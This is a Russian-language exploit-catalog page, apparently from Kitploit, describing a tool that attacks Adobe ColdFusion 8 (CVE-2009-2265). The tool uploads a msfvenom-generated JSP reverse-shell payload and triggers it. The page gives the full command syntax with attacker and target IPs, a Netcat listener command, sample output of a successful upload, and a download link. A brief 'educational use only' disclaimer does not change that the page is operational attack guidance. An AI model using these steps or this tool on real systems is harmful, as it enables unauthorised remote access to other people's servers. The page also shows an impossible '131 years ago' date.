Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Adobe-ColdFusion-8-RCE-CVE-2009-2265 — Adobe ColdFusion 8 - Удаленное выполнение команд (RCE) | Kitploit
Инструменты/GitHubGitHub/0xdtc/adobe-coldfusion-8-rce-cve-2009-2265
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHub0xdtc/adobe-coldfusion-8-rce-cve-2009-2265

Adobe-ColdFusion-8-RCE-CVE-2009-2265

Adobe ColdFusion 8 - Удаленное выполнение команд (RCE)

Репозиторий
131 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Adobe ColdFusion 8 - Эксплуатация удаленного выполнения команд (RCE)

Обзор

Данный эксплойт направлен на известную уязвимость в Adobe ColdFusion 8 (CVE-2009-2265). Он обеспечивает удаленное выполнение команд (RCE) путем загрузки вредоносной JSP-нагрузки, устанавливающей обратную оболочку.


Детали эксплуатации

  • CVE: CVE-2009-2265
  • Уязвимость: Некорректная обработка загрузки файлов в Adobe ColdFusion 8.
  • Затрагиваемые версии: Adobe ColdFusion 8.
  • Воздействие: Позволяет злоумышленникам выполнять произвольные команды на сервере.

Возможности

  1. Автоматическая генерация JSP-нагрузки с помощью .
msfvenom
  • Загрузка нагрузки через multipart POST-запрос.
  • Запуск нагрузки для установки обратной оболочки.
  • Автоматическая очистка локальных файлов нагрузки после выполнения.

  • Использование

    Для использования этого эксплойта вам потребуется:

    • Машина с Kali Linux или аналогичная среда для тестирования на проникновение.
    • Установленный Netcat для прослушивания указанного порта.
    • Уязвимый сервер Adobe ColdFusion 8.

    Синтаксис команды

    root@kitploit:~
    ./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>
    

    Аргументы

    • -l <LHOST>: Локальный IP-адрес атакующего (например, 10.10.16.5).
    • -p <LPORT>: Локальный порт атакующего для обратной оболочки (например, 9001).
    • -r <RHOST>: Удаленный IP-адрес цели (например, 10.10.10.11).
    • -q <RPORT>: Удаленный порт цели, на котором запущен ColdFusion (например, 8500).

    Пример использования

    root@kitploit:~
    ./CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
    
    1. Запустите слушатель на вашей атакующей машине:

      root@kitploit:~
      nc -lnvp 9001
      
    2. Выполните эксплойт с соответствующими аргументами.

    3. После выполнения нагрузка подключится обратно к вашему слушателю.


    Как это работает

    1. Генерация нагрузки:

      • Скрипт использует msfvenom для создания вредоносной JSP-нагрузки.
      • Нагрузка инициирует обратную оболочку на указанные LHOST и LPORT.
    2. Загрузка нагрузки:

      • Нагрузка загружается на уязвимый сервер ColdFusion с помощью POST-запроса.
    3. Запуск нагрузки:

      • Загруженная нагрузка выполняется путем отправки GET-запроса к URL файла.
    4. Установка обратной оболочки:

      • Устанавливается обратная оболочка, предоставляющая атакующему доступ к целевой системе.

    Требования

    • msfvenom для генерации нагрузки.
    • curl для загрузки и запуска нагрузки.
    • nc (Netcat) для прослушивания соединений обратной оболочки.

    Пример вывода

    root@kitploit:~
    [+] Generating JSP reverse shell payload...
    [+] Payload saved as 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
    [+] Uploading the payload to the target...
    [+] Server response:
        <script type="text/javascript">
            window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
        </script>
    [+] Waiting for the Netcat listener to start on port 9001...
    [+] Netcat listener detected running on port 9001!
    [+] Attempting to trigger the payload...
    [+] Payload triggered successfully. Check your listener for the reverse shell.
    [+] Cleaning up local files...
    [+] Done!
    

    Отказ от ответственности

    Этот скрипт предназначен только для образовательных целей. Используйте его только на системах, которые вам принадлежат или на которые у вас есть явное разрешение на тестирование. Несанкционированное использование этого эксплойта на системах, которые вам не принадлежат, является незаконным и неэтичным.


    Автор

    Разработано [0xDTC].

    Скачать инструмент